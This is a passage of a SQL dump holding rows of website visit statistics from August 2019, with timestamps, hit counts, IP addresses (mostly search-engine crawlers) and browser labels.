e'),(444719,1566752799,1,1,0,0,'66.249.66.134','chrome'),(444720,1566754280,1,1,0,0,'40.77.167.145','other'),(444721,1566754609,2,2,0,0,'66.249.66.138','chrome'),(444722,1566755129,1,1,0,0,'91.196.178.94','chrome'),(444723,1566755515,1,1,0,0,'40.77.167.145','other'),(444724,1566755968,1,1,0,0,'8.29.198.25','other'),(444725,1566757126,1,1,0,0,'141.8.188.11','other'),(444726,1566757739,1,1,0,0,'8.29.198.26','other'),(444727,1566757835,1,1,0,0,'40.77.167.94','other'),(444728,1566758164,1,1,0,0,'66.249.66.136','chrome'),(444729,1566758293,2,2,0,0,'66.249.66.134','chrome'),(444730,1566759740,1,1,0,0,'88.253.154.216','chrome'),(444731,1566760086,1,1,0,0,'66.102.9.26','chrome'),(444732,1566760596,2,2,0,0,'66.249.66.138','chrome'),(444733,1566760922,2,2,0,0,'66.249.66.136','chrome'),(444734,1566761074,1,1,0,0,'66.249.66.64','chrome'),(444735,1566762034,1,1,0,0,'40.77.167.94','other'),(444736,1566762280,1,1,0,0,'66.249.66.134','chrome'),(444737,1566764213,1,1,0,0,'37.73.152.129','chrome'),(444738,1566764288,1,1,0,0,'66.249.66.66','chrome'),(444739,1566764511,1,1,0,0,'66.249.66.134','chrome'),(444740,1566764667,1,1,0,0,'40.77.167.93','other'),(444741,1566766205,1,1,0,0,'46.211.96.201','chrome'),(444742,1566766222,1,1,0,0,'66.249.66.68','chrome'),(444743,1566766304,1,1,0,0,'141.8.188.11','other'),(444744,1566766324,1,1,0,0,'46.120.255.82','chrome'),(444745,1566766804,1,1,0,0,'8.29.198.25','other'),(444746,1566767393,3,3,0,0,'207.46.13.111','other'),(444747,1566768360,1,1,0,0,'66.102.9.124','chrome'),(444748,1566768457,1,1,0,0,'66.249.66.134','chrome'),(444749,1566768578,1,1,0,0,'8.29.198.25','other'),(444750,1566769251,1,1,0,0,'40.77.167.94','other'),(444751,1566770106,1,1,0,0,'40.77.167.93','other'),(444752,1566771369,2,2,0,0,'40.77.167.93','other'),(444753,1566772618,1,1,0,0,'40.77.167.93','other'),(444754,1566772869,1,1,0,0,'213.180.203.53','other'),(444755,1566774142,88,88,0,0,'136.243.37.219','other'),(444756,1566775084,1,1,0,0,'66.249.66.138','chrome'),(444757,1566775371,1,1,0,0,'40.77.167.94','other'),(444758,1566775469,1,1,0,0,'40.77.167.93','other'),(444759,1566775728,1,1,0,0,'207.46.13.2','other'),(444760,1566775807,1,1,0,0,'40.77.167.63','other'),(444761,1566776989,1,1,0,0,'40.77.167.93','other'),(444762,1566777644,1,1,0,0,'8.29.198.26','other'),(444763,1566778217,1,1,0,0,'66.249.66.134','chrome'),(444764,1566779233,1,1,0,0,'40.77.167.119','other'),(444765,1566779357,62,62,0,0,'192.151.157.210','other'),(444766,1566779417,1,1,0,0,'8.29.198.27','other'),(444767,1566779429,36,36,0,0,'88.198.69.233','other'),(444768,1566780267,56,56,0,0,'192.151.157.210','other'),(444769,1566780918,1,1,0,0,'157.55.39.217','other'),(444770,1566781064,1,1,0,0,'18.237.54.7','other'),(444771,1566781173,77,77,0,0,'192.151.157.210','other'),(444772,1566782077,105,105,0,0,'192.151.157.210','other'),(444773,1566782379,1,1,0,0,'40.77.167.119','other'),(444774,1566782774,2,2,0,0,'40.77.167.63','other'),(444775,1566782925,1,1,0,0,'91.209.11.236','other'),(444776,1566783844,1,1,0,0,'66.249.66.138','chrome'),(444777,1566784340,1,1,0,0,'157.55.39.217','other'),(444778,1566784421,1,1,0,0,'40.77.167.97','other'),(444779,1566785213,1,1,0,0,'40.77.167.119','other'),(444780,1566785979,1,1,0,0,'40.77.167.97','other'),(444781,1566786449,1,1,0,0,'13.66.139.0','other'),(444782,1566786592,1,1,0,0,'157.55.39.217','other'),(444783,1566787193,1,1,0,0,'40.77.167.63','other'),(444784,1566788467,1,1,0,0,'8.29.198.25','other'),(444785,1566788882,1,1,0,0,'39.104.180.138','other'),(444786,1566788996,1,1,0,0,'141.8.188.29','other'),(444787,1566789132,1,1,0,0,'40.77.167.97','other'),(444788,1566789217,1,1,0,0,'157.55.39.217','other'),(444789,1566789610,1,1,0,0,'40.77.167.63','other'),(444790,1566790261,1,1,0,0,'8.29.198.26','other'),(444791,1566790654,1,1,0,0,'193.106.30.99','chrome'),(444792,1566791308,3,3,0,0,'207.46.13.134','other'),(444793,1566791724,2,2,0,0,'66.249.66.138','chrome'),(444794,1566791815,1,1,0,0,'66.249.66.64','chrome'),(444795,1566793740,1,1,0,0,'66.249.66.68','chrome'),(444796,1566793857,2,2,0,0,'66.249.66.136','chrome'),(444797,1566794070,1,1,0,0,'141.8.188.11','other'),(444798,1566794497,2,2,0,0,'141.8.188.29','other'),(444799,1566794579,1,1,0,0,'157.55.39.217','other'),(444800,1566795442,1,1,0,0,'141.8.188.11','other'),(444801,1566795979,1,1,0,0,'91.209.11.236','other'),(444802,1566796386,1,1,0,0,'66.249.66.68','chrome'),(444803,1566796878,3,3,0,0,'157.55.39.217','other'),(444804,1566797255,1,1,0,0,'207.46.13.134','other'),(444805,1566797460,1,1,0,0,'66.249.66.136','chrome'),(444806,1566797482,1,1,0,0,'157.55.39.206','other'),(444807,1566799294,1,1,0,0,'8.29.198.27','other'),(444808,1566800956,2,2,0,0,'40.77.167.89','other'),(444809,1566801095,1,1,0,0,'8.29.198.26','other'),(444810,1566802476,1,1,0,0,'91.196.178.183','chrome'),(444811,1566803346,1,1,0,0,'95.108.181.54','other'),(444812,1566803888,1,1,0,0,'66.249.66.66','chrome'),(444813,1566804078,1,1,0,0,'157.55.39.206','other'),(444814,1566804768,3,3,0,0,'141.8.142.103','other'),(444815,1566805954,1,1,0,0,'157.55.39.206','other'),(444816,1566806040,1,1,0,0,'178.154.171.24','other'),(444817,1566807732,2,2,0,0,'66.249.66.134','chrome'),(444818,1566808328,2,2,0,0,'195.10.210.49','firefox'),(444819,1566808491,1,1,0,0,'141.8.142.103','other'),(444820,1566808495,1,1,0,0,'5.45.207.8','other'),(444821,1566808499,1,1,0,0,'87.250.224.81','other'),(444822,1566808502,1,1,0,0,'213.180.203.9','other'),(444823,1566808557,1,1,0,0,'157.55.39.206','other'),(444824,1566808558,1,1,0,0,'37.9.113.20','other'),(444825,1566808711,1,1,0,0,'91.196.178.93','chrome'),(444826,1566809710,1,1,0,0,'207.46.13.134','other'),(444827,1566809717,1,1,0,0,'66.249.66.138','chrome'),(444828,1566809754,1,1,0,0,'66.249.66.136','chrome'),(444829,1566810126,1,1,0,0,'8.29.198.25','other'),(444830,1566810556,1,1,0,0,'141.8.188.29','other'),(444831,1566810589,1,1,0,0,'157.55.39.206','other'),(444832,1566811308,1,1,0,0,'37.204.243.154','msie'),(444833,1566811945,1,1,0,0,'8.29.198.26','other'),(444834,1566812361,1,1,0,0,'178.154.171.24','other'),(444835,1566812395,2,2,0,0,'213.180.203.17','other'),(444836,1566813111,1,1,0,0,'66.249.66.138','chrome'),(444837,1566814018,1,1,0,0,'193.106.30.99','chrome'),(444838,1566814085,1,1,0,0,'109.74.154.72','chrome'),(444839,1566814316,1,1,0,0,'213.180.203.23','other'),(444840,1566814395,1,1,0,0,'178.154.171.24','other'),(444841,1566814886,1,1,0,0,'91.209.11.236','other'),(444842,1566815100,1,1,0,0,'40.77.167.89','other'),(444843,1566815235,1,1,0,0,'66.249.66.136','chrome'),(444844,1566815441,1,1,0,0,'157.55.39.38','other'),(444845,1566815483,1,1,0,0,'66.102.9.30','chrome'),(444846,1566815990,1,1,0,0,'87.250.224.64','other'),(444847,1566815993,1,1,0,0,'5.255.253.16','other'),(444848,1566815999,1,1,0,0,'5.45.207.19','other'),(444849,1566816057,1,1,0,0,'37.9.113.38','other'),(444850,1566816788,1,1,0,0,'157.55.39.38','other'),(444851,1566816816,1,1,0,0,'40.77.167.89','other'),(444852,1566816985,1,1,0,0,'207.46.13.134','other'),(444853,1566817474,1,1,0,0,'87.250.224.107','other'),(444854,1566817500,1,1,0,0,'213.180.203.48','other'),(444855,1566817917,1,1,0,0,'207.46.13.134','other'),(444856,1566818842,1,1,0,0,'66.249.66.138','chrome'),(444857,1566819006,101,101,0,0,'207.46.13.49','other'),(444858,1566819081,1,1,0,0,'5.45.207.79','other'),(444859,1566819086,1,1,0,0,'87.250.224.47','other'),(444860,1566819124,1,1,0,0,'141.8.188.29','other'),(444861,1566819612,99,99,0,0,'207.46.13.134','other'),(444862,1566819875,92,92,0,0,'40.77.167.89','other'),(444863,1566820163,1,1,0,0,'91.196.178.87','chrome'),(444864,1566820827,1,1,0,0,'141.8.142.65','other'),(444865,1566820971,1,1,0,0,'8.29.198.25','other'),(444866,1566821448,1,1,0,0,'66.249.66.138','chrome'),(444867,1566821495,1,1,0,0,'66.249.66.64','chrome'),(444868,1566821736,1,1,0,0,'66.249.66.134','chrome'),(444869,1566821751,1,1,0,0,'66.249.66.136','chrome'),(444870,1566822288,2,2,0,0,'141.8.188.29','other'),(444871,1566822415,1,1,0,0,'66.249.66.64','chrome'),(444872,1566822681,1,1,0,0,'66.249.66.134','chrome'),(444873,1566822784,1,1,0,0,'8.29.198.26','other'),(444874,1566823645,1,1,0,0,'5.45.207.79','other'),(444875,1566823675,1,1,0,0,'87.250.224.47','other'),(444876,1566823684,1,1,0,0,'37.9.113.148','other'),(444877,1566823717,1,1,0,0,'141.8.188.11','other'),(444878,1566823797,1,1,0,0,'66.249.66.134','chrome'),(444879,1566824302,1,1,0,0,'66.249.66.136','chrome'),(444880,1566825199,1,1,0,0,'5.45.207.8','other'),(444881,1566826859,1,1,0,0,'5.45.207.79','other'),(444882,1566828287,1,1,0,0,'91.196.178.131','chrome'),(444883,1566828485,1,1,0,0,'5.45.207.79','other'),(444884,1566828856,1,1,0,0,'141.8.188.29','other'),(444885,1566829837,2,2,0,0,'157.55.39.72','other'),(444886,1566830224,2,2,0,0,'141.8.188.29','other'),(444887,1566830491,1,1,0,0,'40.77.167.144','other'),(444888,1566831338,1,1,0,0,'157.55.39.72','other'),(444889,1566831623,2,2,0,0,'141.8.142.103','other'),(444890,1566831627,1,1,0,0,'5.45.207.19','other'),(444891,1566831809,1,1,0,0,'8.29.198.27','other'),(444892,1566831885,1,1,0,0,'141.8.188.29','other'),(444893,1566832626,1,1,0,0,'66.249.66.136','chrome'),(444894,1566833481,1,1,0,0,'141.8.188.29','other'),(444895,1566833639,1,1,0,0,'8.29.198.26','other'),(444896,1566833704,1,1,0,0,'157.55.39.72','other'),(444897,1566833752,1,1,0,0,'66.249.66.68','chrome'),(444898,1566834021,2,2,0,0,'66.249.66.134','chrome'),(444899,1566834345,1,1,0,0,'141.8.142.103','other'),(444900,1566834368,1,1,0,0,'91.209.11.236','other'),(444901,1566834956,1,1,0,0,'207.46.13.143','other'),(444902,1566835567,1,1,0,0,'157.55.39.100','other'),(444903,1566835717,1,1,0,0,'66.249.66.66','chrome'),(444904,1566835743,1,1,0,0,'178.154.200.48','other'),(444905,1566835755,1,1,0,0,'87.250.224.81','other'),(444906,1566835759,1,1,0,0,'5.45.207.19','other'),(444907,1566835919,1,0,1,0,'66.249.66.136',''),(444908,1566836951,1,1,0,0,'193.106.30.99','chrome'),(444909,1566837389,2,2,0,0,'77.111.247.181','chrome'),(444910,1566838357,1,1,0,0,'40.77.167.144','other'),(444911,1566839223,1,1,0,0,'91.196.178.94','firefox'),(444912,1566839267,1,1,0,0,'207.46.13.143','other'),(444913,1566839516,2,2,0,0,'40.77.167.144','other'),(444914,1566839814,1,1,0,0,'66.249.66.136','chrome'),(444915,1566839920,1,1,0,0,'141.8.142.103','other'),(444916,1566839924,1,1,0,0,'5.45.207.19','other'),(444917,1566839931,1,1,0,0,'37.9.113.148','other'),(444918,1566839934,1,1,0,0,'141.8.188.29','other'),(444919,1566839949,1,1,0,0,'5.45.207.79','other'),(444920,1566840263,1,1,0,0,'66.249.66.138','chrome'),(444921,1566840383,1,1,0,0,'66.249.66.64','chrome'),(444922,1566840390,1,1,0,0,'66.249.66.66','chrome'),(444923,1566841252,1,1,0,0,'178.154.171.17','other'),(444924,1566842032,1,1,0,0,'157.55.39.72','other'),(444925,1566842089,2,2,0,0,'66.249.66.136','chrome'),(444926,1566842613,2,2,0,0,'157.55.39.100','other'),(444927,1566842617,1,1,0,0,'141.8.142.191','other'),(444928,1566842646,1,1,0,0,'8.29.198.27','other'),(444929,1566842649,1,1,0,0,'37.9.113.148','other'),(444930,1566842658,1,1,0,0,'213.180.203.17','other'),(444931,1566842660,1,1,0,0,'141.8.142.108','other'),(444932,1566843380,1,1,0,0,'34.247.27.134','other'),(444933,1566843970,1,1,0,0,'87.250.224.118','other'),(444934,1566843991,1,1,0,0,'213.180.203.61','other'),(444935,1566844472,1,1,0,0,'8.29.198.25','other'),(444936,1566844618,1,1,0,0,'157.55.39.72','other'),(444937,1566844624,1,1,0,0,'157.55.39.61','other'),(444938,1566844996,1,1,0,0,'91.209.11.236','other'),(444939,1566845239,1,1,0,0,'141.8.188.11','other'),(444940,1566845278,1,1,0,0,'141.8.142.103','other'),(444941,1566846503,1,1,0,0,'93.158.166.7','other'),(444942,1566847429,1,1,0,0,'46.48.13.161','chrome'),(444943,1566847761,1,1,0,0,'37.9.113.20','other'),(444944,1566847776,1,1,0,0,'141.8.188.29','other'),(444945,1566847784,2,2,0,0,'141.8.142.103','other'),(444946,1566848219,1,1,0,0,'66.249.66.66','chrome'),(444947,1566848376,1,1,0,0,'66.249.66.134','chrome'),(444948,1566848665,1,1,0,0,'207.46.13.143','other'),(444949,1566849116,1,1,0,0,'141.8.142.103','other'),(444950,1566849120,1,1,0,0,'87.250.224.65','other'),(444951,1566849777,1,1,0,0,'66.249.66.68','chrome'),(444952,1566849858,2,2,0,0,'95.213.141.126','opera'),(444953,1566849951,1,1,0,0,'141.8.188.29','other'),(444954,1566850402,1,1,0,0,'5.45.207.79','other'),(444955,1566850419,1,1,0,0,'141.8.142.103','other'),(444956,1566851021,1,1,0,0,'66.249.66.64','chrome'),(444957,1566851614,2,2,0,0,'141.8.188.29','other'),(444958,1566852735,1,1,0,0,'157.55.39.232','other'),(444959,1566852739,1,1,0,0,'207.46.13.9','other'),(444960,1566853438,1,1,0,0,'141.8.188.11','other'),(444961,1566853489,1,1,0,0,'8.29.198.27','other'),(444962,1566854009,1,1,0,0,'66.249.66.68','chrome'),(444963,1566854035,1,1,0,0,'95.108.213.4','other'),(444964,1566854058,1,1,0,0,'157.55.39.232','other'),(444965,1566854060,1,1,0,0,'37.9.113.148','other'),(444966,1566854470,1,1,0,0,'207.46.13.143','other'),(444967,1566854646,3,3,0,0,'66.249.66.136','chrome'),(444968,1566854881,1,1,0,0,'207.46.13.9','other'),(444969,1566855300,1,1,0,0,'8.29.198.27','other'),(444970,1566855458,1,1,0,0,'87.250.224.65','other'),(444971,1566855506,1,1,0,0,'141.8.188.29','other'),(444972,1566857158,1,1,0,0,'66.249.66.136','chrome'),(444973,1566857190,1,1,0,0,'5.45.207.19','other'),(444974,1566857296,1,1,0,0,'141.8.188.29','other'),(444975,1566857703,1,1,0,0,'207.46.13.143','other'),(444976,1566858107,1,1,0,0,'157.55.39.235','other'),(444977,1566858886,3,3,0,0,'5.45.207.79','other'),(444978,1566858889,1,1,0,0,'141.8.188.11','other'),(444979,1566859220,1,1,0,0,'66.249.66.138','chrome'),(444980,1566860252,1,1,0,0,'95.108.213.4','other'),(444981,1566860338,1,1,0,0,'193.106.30.99','chrome'),(444982,1566860870,1,1,0,0,'40.77.167.151','other'),(444983,1566861504,1,1,0,0,'87.250.224.65','other'),(444984,1566861531,1,1,0,0,'141.8.142.103','other'),(444985,1566861946,1,1,0,0,'157.55.39.182','other'),(444986,1566862978,1,1,0,0,'66.249.66.138','chrome'),(444987,1566863063,1,1,0,0,'141.8.188.11','other'),(444988,1566863097,1,1,0,0,'37.9.113.148','other'),(444989,1566863183,1,1,0,0,'191.6.204.94','chrome'),(444990,1566863391,1,1,0,0,'157.55.39.182','other'),(444991,1566863538,3,3,0,0,'141.8.188.29','other'),(444992,1566864316,1,1,0,0,'8.29.198.26','other'),(444993,1566864375,1,1,0,0,'66.249.66.138','chrome'),(444994,1566864553,1,1,0,0,'37.9.113.148','other'),(444995,1566864581,1,1,0,0,'95.108.213.4','other'),(444996,1566864732,2,2,0,0,'157.55.39.235','other'),(444997,1566865854,1,1,0,0,'141.8.142.162','other'),(444998,1566865877,1,1,0,0,'5.45.207.19','other'),(444999,1566866136,1,1,0,0,'8.29.198.27','other'),(445000,1566867018,1,1,0,0,'157.55.39.182','other'),(445001,1566867036,2,2,0,0,'141.8.188.29','other'),(445002,1566867045,1,1,0,0,'141.8.188.65','other'),(445003,1566867103,1,1,0,0,'66.249.66.68','chrome'),(445004,1566867191,1,1,0,0,'128.124.62.251','chrome'),(445005,1566868249,1,1,0,0,'87.250.224.47','other'),(445006,1566868251,1,1,0,0,'141.8.142.108','other'),(445007,1566869837,1,1,0,0,'66.249.66.136','chrome'),(445008,1566871005,1,1,0,0,'157.55.39.182','other'),(445009,1566871349,1,1,0,0,'128.124.23.50','chrome'),(445010,1566872106,1,1,0,0,'87.250.224.65','other'),(445011,1566872112,1,1,0,0,'37.9.113.103','other'),(445012,1566872154,1,1,0,0,'95.108.213.4','other'),(445013,1566872695,1,1,0,0,'91.209.11.236','other'),(445014,1566873635,1,1,0,0,'157.55.39.182','other'),(445015,1566874386,1,1,0,0,'141.8.188.29','other'),(445016,1566874841,1,1,0,0,'5.45.207.19','other'),(445017,1566875151,1,1,0,0,'8.29.198.26','other'),(445018,1566875942,1,1,0,0,'178.154.200.48','other'),(445019,1566876997,1,1,0,0,'8.29.198.26','other'),(445020,1566877204,1,1,0,0,'93.178.82.133','chrome'),(445021,1566877265,1,1,0,0,'141.8.188.29','other'),(445022,1566878420,1,1,0,0,'157.55.39.193','other'),(445023,1566879152,1,1,0,0,'91.106.199.104','other'),(445024,1566879169,1,1,0,0,'141.8.188.29','other'),(445025,1566880882,1,1,0,0,'157.55.39.182','other'),(445026,1566881373,1,1,0,0,'157.55.39.193','other'),(445027,1566881442,1,1,0,0,'141.8.188.29','other'),(445028,1566882024,1,1,0,0,'46.211.121.157','chrome'),(445029,1566882751,1,1,0,0,'141.8.188.29','other'),(445030,1566883624,1,1,0,0,'157.55.39.182','other'),(445031,1566883935,1,1,0,0,'207.46.13.165','other'),(445032,1566883998,1,1,0,0,'37.9.113.148','other'),(445033,1566884667,1,1,0,0,'66.249.66.68','chrome'),(445034,1566884857,1,1,0,0,'13.66.139.0','other'),(445035,1566884923,1,1,0,0,'66.249.66.136','chrome'),(445036,1566884943,1,1,0,0,'66.249.66.134','chrome'),(445037,1566885312,1,1,0,0,'5.45.207.19','other'),(445038,1566885316,1,1,0,0,'141.8.188.11','other'),(445039,1566885333,1,1,0,0,'141.8.142.103','other'),(445040,1566885985,1,1,0,0,'8.29.198.26','other'),(445041,1566886293,1,1,0,0,'141.8.188.29','other'),(445042,1566886639,1,1,0,0,'91.124.28.205','chrome'),(445043,1566887491,2,2,0,0,'66.249.66.136','chrome'),(445044,1566887840,1,1,0,0,'8.29.198.26','other'),(445045,1566888099,1,1,0,0,'5.45.207.8','other'),(445046,1566888974,1,1,0,0,'157.55.39.182','other'),(445047,1566889313,1,1,0,0,'5.45.207.79','other'),(445048,1566889317,1,1,0,0,'5.45.207.19','other'),(445049,1566890178,1,1,0,0,'66.249.66.138','chrome'),(445050,1566890299,5,5,0,0,'207.46.13.58','other'),(445051,1566890552,1,1,0,0,'37.9.113.20','other'),(445052,1566890573,1,1,0,0,'178.154.171.24','other'),(445053,1566890632,6,6,0,0,'157.55.39.193','other'),(445054,1566890798,3,3,0,0,'157.55.39.182','other'),(445055,1566891407,1,1,0,0,'91.196.178.169','chrome'),(445056,1566891628,1,1,0,0,'93.159.230.28','chrome'),(445057,1566891950,1,1,0,0,'37.73.138.248','other'),(445058,1566891962,1,1,0,0,'141.8.188.29','other'),(445059,1566892500,1,1,0,0,'91.196.178.169','chrome'),(445060,1566893300,3,3,0,0,'141.8.188.29','other'),(445061,1566893341,1,1,0,0,'87.250.224.65','other'),(445062,1566894489,1,1,0,0,'195.162.90.62','chrome'),(445063,1566894780,1,1,0,0,'66.249.66.136','chrome'),(445064,1566894792,1,1,0,0,'157.55.39.182','other'),(445065,1566894796,2,2,0,0,'141.8.188.29','other'),(445066,1566894855,1,1,0,0,'141.8.188.11','other'),(445067,1566895029,1,1,0,0,'37.73.138.248','other'),(445068,1566895792,1,1,0,0,'66.249.66.136','chrome'),(445069,1566896262,1,1,0,0,'141.8.188.29','other'),(445070,1566896265,1,1,0,0,'37.9.113.103','other'),(445071,1566896818,1,1,0,0,'8.29.198.26','other'),(445072,1566897754,1,1,0,0,'157.55.39.182','other'),(445073,1566897882,1,1,0,0,'141.8.188.11','other'),(445074,1566897968,1,1,0,0,'54.208.102.37','other'),(445075,1566897970,1,1,0,0,'107.21.1.8','other'),(445076,1566898511,2,2,0,0,'207.46.13.58','other'),(445077,1566898674,1,1,0,0,'8.29.198.27','other'),(445078,1566898943,1,1,0,0,'157.55.39.182','other'),(445079,1566899595,1,1,0,0,'141.8.188.29','other'),(445080,1566899832,1,1,0,0,'157.55.39.193','other'),(445081,1566900770,1,1,0,0,'5.45.207.19','other'),(445082,1566901754,1,1,0,0,'213.180.203.23','other'),(445083,1566902067,1,1,0,0,'109.185.183.43','chrome'),(445084,1566902206,1,1,0,0,'141.8.188.29','other'),(445085,1566902476,1,1,0,0,'87.250.224.64','other'),(445086,1566902681,1,1,0,0,'87.250.224.107','other'),(445087,1566902769,1,1,0,0,'13.66.139.0','other'),(445088,1566903513,1,1,0,0,'207.180.251.145','chrome'),(445089,1566904088,1,1,0,0,'66.249.66.134','chrome'),(445090,1566905189,2,2,0,0,'66.249.66.136','chrome'),(445091,1566905314,1,1,0,0,'37.9.113.38','other'),(445092,1566905333,1,1,0,0,'141.8.188.29','other'),(445093,1566905813,1,1,0,0,'193.106.30.99','chrome'),(445094,1566906060,3,3,0,0,'157.55.39.193','other'),(445095,1566906178,1,1,0,0,'66.249.66.136','chrome'),(445096,1566906374,1,1,0,0,'109.74.154.72','chrome'),(445097,1566906977,1,1,0,0,'87.250.224.47','other'),(445098,1566906990,1,1,0,0,'178.154.200.48','other'),(445099,1566907050,1,1,0,0,'37.9.113.148','other'),(445100,1566907067,1,1,0,0,'178.153.22.191','chrome'),(445101,1566907654,1,1,0,0,'8.29.198.27','other'),(445102,1566907819,1,1,0,0,'157.55.39.182','other'),(445103,1566908943,1,1,0,0,'93.158.166.7','other'),(445104,1566908997,1,1,0,0,'141.8.142.162','other'),(445105,1566909516,1,1,0,0,'8.29.198.27','other'),(445106,1566909653,1,1,0,0,'91.196.178.161','chrome'),(445107,1566910739,1,1,0,0,'91.196.178.161','chrome'),(445108,1566911303,1,1,0,0,'46.211.50.27','chrome'),(445109,1566911486,1,1,0,0,'5.255.253.16','other'),(445110,1566911523,1,1,0,0,'37.9.113.38','other'),(445111,1566911538,1,1,0,0,'141.8.142.103','other'),(445112,1566911796,1,1,0,0,'157.55.39.193','other'),(445113,1566912100,1,1,0,0,'178.154.200.48','other'),(445114,1566912356,1,1,0,0,'80.95.44.255','chrome'),(445115,1566913350,1,1,0,0,'66.249.66.138','chrome'),(445116,1566913568,1,1,0,0,'91.196.178.172','chrome'),(445117,1566913581,1,1,0,0,'141.8.142.38','other'),(445118,1566913604,1,1,0,0,'91.196.178.169','chrome'),(445119,1566913721,1,1,0,0,'109.86.28.179','chrome'),(445120,1566914735,1,1,0,0,'91.196.178.49','chrome'),(445121,1566914907,3,3,0,0,'157.55.39.56','other'),(445122,1566914941,3,3,0,0,'66.249.66.134','chrome'),(445123,1566915196,2,2,0,0,'141.8.142.162','other'),(445124,1566915199,2,2,0,0,'5.45.207.80','other'),(445125,1566915274,1,1,0,0,'178.154.171.24','other'),(445126,1566915342,1,1,0,0,'207.46.13.80','other'),(445127,1566915349,1,1,0,0,'5.255.253.25','other'),(445128,1566916287,1,1,0,0,'157.55.39.56','other'),(445129,1566916937,1,1,0,0,'46.211.102.44','chrome'),(445130,1566917286,2,2,0,0,'5.45.207.19','other'),(445131,1566917350,1,1,0,0,'141.8.142.103','other'),(445132,1566918485,1,1,0,0,'8.29.198.26','other'),(445133,1566918516,1,1,0,0,'66.249.66.138','chrome'),(445134,1566920012,1,1,0,0,'157.55.39.51','other'),(445135,1566920380,1,1,0,0,'8.29.198.27','other'),(445136,1566921034,1,1,0,0,'91.196.178.188','chrome'),(445137,1566922127,1,1,0,0,'91.196.178.133','chrome'),(445138,1566922559,1,1,0,0,'5.45.207.79','other'),(445139,1566923101,1,1,0,0,'82.145.211.147','other'),(445140,1566923374,1,1,0,0,'141.8.188.11','other'),(445141,1566923406,1,1,0,0,'95.108.181.96','other'),(445142,1566923612,1,1,0,0,'141.8.188.29','other'),(445143,1566923711,1,1,0,0,'66.249.66.134','chrome'),(445144,1566925049,1,1,0,0,'141.8.188.29','other'),(445145,1566925069,1,1,0,0,'128.124.235.34','chrome'),(445146,1566925994,1,1,0,0,'82.145.210.145','other'),(445147,1566926517,1,1,0,0,'66.249.66.136','chrome'),(445148,1566926545,1,1,0,0,'157.55.39.193','other'),(445149,1566926688,1,1,0,0,'91.209.11.236','other'),(445150,1566927343,1,1,0,0,'141.8.188.29','other'),(445151,1566927761,1,1,0,0,'178.133.165.217','chrome'),(445152,1566927796,1,1,0,0,'157.55.39.56','other'),(445153,1566927820,1,1,0,0,'66.249.66.68','chrome'),(445154,1566928159,1,1,0,0,'207.46.13.88','other'),(445155,1566928487,2,2,0,0,'176.37.108.96','chrome'),(445156,1566929088,1,1,0,0,'91.209.11.236','other'),(445157,1566929317,1,1,0,0,'8.29.198.26','other'),(445158,1566929347,1,1,0,0,'87.250.224.47','other'),(445159,1566929350,1,1,0,0,'5.45.207.79','other'),(445160,1566929356,1,1,0,0,'87.250.224.65','other'),(445161,1566929436,1,1,0,0,'46.211.131.45','chrome'),(445162,1566929492,1,1,0,0,'91.196.178.75','firefox'),(445163,1566929735,1,1,0,0,'37.73.172.20','chrome'),(445164,1566930477,1,1,0,0,'2.58.44.154','chrome'),(445165,1566930501,1,1,0,0,'207.46.13.224','other'),(445166,1566930771,2,2,0,0,'66.249.66.134','chrome'),(445167,1566930859,1,1,0,0,'54.214.213.175','chrome'),(445168,1566931225,1,1,0,0,'8.29.198.25','other'),(445169,1566931631,1,1,0,0,'66.249.66.138','chrome'),(445170,1566931911,1,1,0,0,'157.55.39.157','other'),(445171,1566932425,1,1,0,0,'37.9.113.148','other'),(445172,1566932490,1,1,0,0,'141.8.188.11','other'),(445173,1566932542,2,1,1,0,'66.249.66.138',''),(445174,1566932670,1,1,0,0,'66.249.66.136','chrome'),(445175,1566932848,1,1,0,0,'141.8.188.29','other'),(445176,1566933223,1,1,0,0,'213.180.203.23','other'),(445177,1566933836,1,1,0,0,'178.154.200.48','other'),(445178,1566934405,1,1,0,0,'207.46.13.133','other'),(445179,1566934699,1,1,0,0,'66.249.66.134','chrome'),(445180,1566934803,1,1,0,0,'66.249.66.136','chrome'),(445181,1566936427,1,1,0,0,'207.46.13.27','other'),(445182,1566937001,2,2,0,0,'5.45.207.19','other'),(445183,1566937065,1,1,0,0,'141.8.142.103','other'),(445184,1566937152,1,1,0,0,'66.249.66.134','chrome'),(445185,1566937503,1,1,0,0,'157.55.39.56','other'),(445186,1566938631,1,1,0,0,'66.249.66.138','chrome'),(445187,1566938763,1,1,0,0,'207.46.13.224','other'),(445188,1566938850,1,1,0,0,'141.8.188.29','other'),(445189,1566938880,1,1,0,0,'5.45.207.19','other'),(445190,1566939005,1,1,0,0,'66.249.66.66','chrome'),(445191,1566939356,2,2,0,0,'66.249.66.134','chrome'),(445192,1566939863,1,1,0,0,'207.46.13.224','other'),(445193,1566940156,1,1,0,0,'8.29.198.26','other'),(445194,1566940230,1,1,0,0,'91.196.178.56','chrome'),(445195,1566940336,1,1,0,0,'141.8.188.11','other'),(445196,1566940343,1,1,0,0,'2.58.44.154','chrome'),(445197,1566941751,1,1,0,0,'5.45.207.19','other'),(445198,1566942069,1,1,0,0,'8.29.198.25','other'),(445199,1566942090,1,1,0,0,'212.24.109.232','chrome'),(445200,1566943375,1,1,0,0,'66.249.66.136','chrome'),(445201,1566943431,1,1,0,0,'87.250.224.120','other'),(445202,1566944786,1,1,0,0,'207.46.13.133','other'),(445203,1566944858,2,2,0,0,'141.8.188.11','other'),(445204,1566944862,1,1,0,0,'95.108.181.54','other'),(445205,1566944866,1,1,0,0,'141.8.142.103','other'),(445206,1566944877,1,1,0,0,'207.46.13.27','other'),(445207,1566946473,1,1,0,0,'141.8.188.11','other'),(445208,1566946698,1,1,0,0,'141.8.142.103','other'),(445209,1566946786,1,1,0,0,'207.46.13.27','other'),(445210,1566947572,1,1,0,0,'66.102.9.28','chrome'),(445211,1566947748,1,1,0,0,'207.46.13.133','other'),(445212,1566949354,1,1,0,0,'87.250.224.81','other'),(445213,1566949784,2,2,0,0,'141.8.188.29','other'),(445214,1566949871,1,1,0,0,'207.46.13.27','other'),(445215,1566950781,1,1,0,0,'141.8.188.29','other'),(445216,1566950992,1,1,0,0,'8.29.198.25','other'),(445217,1566951004,1,1,0,0,'5.45.207.19','other'),(445218,1566951890,1,1,0,0,'141.8.188.11','other'),(445219,1566952510,1,1,0,0,'193.106.30.99','chrome'),(445220,1566952540,1,1,0,0,'141.8.188.29','other'),(445221,1566952908,1,1,0,0,'8.29.198.26','other'),(445222,1566953358,1,1,0,0,'66.249.66.138','chrome'),(445223,1566953596,2,2,0,0,'157.55.39.56','other'),(445224,1566955055,1,1,0,0,'66.249.66.136','chrome'),(445225,1566955104,1,1,0,0,'40.77.167.12','other'),(445226,